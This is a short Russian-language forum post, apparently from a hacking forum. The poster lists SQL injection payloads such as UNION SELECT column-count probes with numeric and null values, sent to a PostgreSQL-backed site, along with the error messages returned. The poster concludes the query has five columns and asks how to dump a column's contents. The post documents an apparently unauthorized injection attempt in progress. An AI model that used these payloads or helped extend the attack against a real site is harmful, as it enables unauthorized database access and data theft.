Ночь добрая!
отправляю:
1'+union+select+1,2,3,4,5,6-- false
выпадает:
Query failed: ERROR: each UNION query must have the same number of columns LINE
отправляю:
'+union+select+1,2,3,4,5-- true
Query failed: ERROR: UNION types timestamp without time zone and integer cannot be matched LINE 3
отправляю:
1'+union+select+1,2,3,4-- false
Query failed: ERROR: each UNION query must have the same number of columns LINE 3
Насколько я понял из статьи:
https://rdot.org
5 столбцов
Решил перепроверить с
'+union+select+null,null,null,null,null-- false
'+union+select+null,null,null,null-- true
Вроде понятно что количество столбцов
5
А как вывести колонку?
Не пинайте первый раз с
PostgreSQLмучаюсь